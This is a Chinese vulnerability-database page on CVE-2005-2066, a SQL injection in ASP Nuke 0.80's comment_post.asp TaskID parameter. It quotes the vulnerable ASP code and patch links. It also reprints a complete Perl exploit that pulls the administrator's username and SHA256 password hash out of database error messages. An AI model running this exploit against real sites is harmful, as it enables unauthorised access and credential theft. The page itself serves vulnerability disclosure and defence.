CVE-2005-2066
CVSS7.5
发布时间 :2005-06-29 00:00:00
修订时间 :2016-10-17 23:24:44
NMCOE    

[原文]SQL injection vulnerability in comment_post.asp in ASP Nuke 0.80 allows remote attackers to execute arbitrary SQL statements via the TaskID parameter.


[CNNVD]ASP-Nuke 'comment_post.asp'远程SQL注入漏洞(CNNVD-200506-222)

        ASP-Nuke是一款开放源码的软件应用,可在Web Server上运行基于社区的站点。
        ASP-Nuke中存在SQL注入漏洞,远程攻击者可以利用此漏洞非授权访问数据库。
        起因是没有正确的过滤用户输入。请看/module/support/task/comment_post.asp的第36行和第75行代码:
                  ...
         nTaskID = steNForm("TaskID")
         ...
         If sErrorMsg = "" Then
         ' prevent dup posting here
         sStat = "SELECT TaskID " &_
         "FROM tblTaskComment " &_
         "WHERE TaskID = " & nTaskID & " " &_
         "AND Subject = '" & Replace(sSubject, "'", "''") & "' " &_
         "AND Body LIKE '" & Replace(sBody, "'", "''") & "'"
         ...
         ?>
        可见对TaskID参数没有任何控制,而该参数的值未经过滤便放到了SQL查询中,导致SQL注入攻击。
        成功利用这个漏洞的攻击者可以完全控制基础数据库系统。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2066
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2066
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-222
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111989223906484&w=2
(UNKNOWN)  BUGTRAQ  20050626 M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80
http://marc.info/?l=bugtraq&m=111999188612055&w=2
(UNKNOWN)  BUGTRAQ  20050627 SQL Injection Exploit for ASPNuke <= 0.80
http://www.securityfocus.com/bid/14064
(UNKNOWN)  BID  14064

- 漏洞信息

ASP-Nuke 'comment_post.asp'远程SQL注入漏洞
高危 SQL注入
2005-06-29 00:00:00 2005-10-20 00:00:00
远程  
        ASP-Nuke是一款开放源码的软件应用,可在Web Server上运行基于社区的站点。
        ASP-Nuke中存在SQL注入漏洞,远程攻击者可以利用此漏洞非授权访问数据库。
        起因是没有正确的过滤用户输入。请看/module/support/task/comment_post.asp的第36行和第75行代码:
                  ...
         nTaskID = steNForm("TaskID")
         ...
         If sErrorMsg = "" Then
         ' prevent dup posting here
         sStat = "SELECT TaskID " &_
         "FROM tblTaskComment " &_
         "WHERE TaskID = " & nTaskID & " " &_
         "AND Subject = '" & Replace(sSubject, "'", "''") & "' " &_
         "AND Body LIKE '" & Replace(sBody, "'", "''") & "'"
         ...
         ?>
        可见对TaskID参数没有任何控制,而该参数的值未经过滤便放到了SQL查询中,导致SQL注入攻击。
        成功利用这个漏洞的攻击者可以完全控制基础数据库系统。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.asp-nuke.com/downloads.asp

- 漏洞信息 (1071)

ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit (EDBID:1071)
asp webapps
2005-06-27 Verified
0 Alberto Trivero
N/A [点击下载]
#!/usr/bin/perl -w
#
# SQL Injection Exploit for ASPNuke <= 0.80
# This exploit retrieve the username of the administrator of the board and his password crypted in SHA256
# Related advisory: http://www.securityfocus.com/archive/1/403479/30/0/threaded
# Discovered and Coded by Alberto Trivero

use LWP::Simple;

print "\n\t===============================\n";
print "\t= Exploit for ASPNuke <= 0.80 =\n";
print "\t=     by Alberto Trivero      =\n";
print "\t===============================\n\n";

if(@ARGV!=1 or !($ARGV[0]=~m/http/)) {
   print "Usage:\nperl $0 [full_target_path]\n\nExamples:\nperl $0 http://www.example.com/aspnuke/\n";
   exit(0);
}

$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Username") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin is: $1\n";
print "[-] Unable to retrieve Username\n" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-06-27]
		

- 漏洞信息

17703
ASP Nuke comment_post.asp TaskID Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

ASP Nuke contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the comment_post.asp script not properly sanitizing user-supplied input to the 'TaskID' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-06-26 Unknow
2005-06-26 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站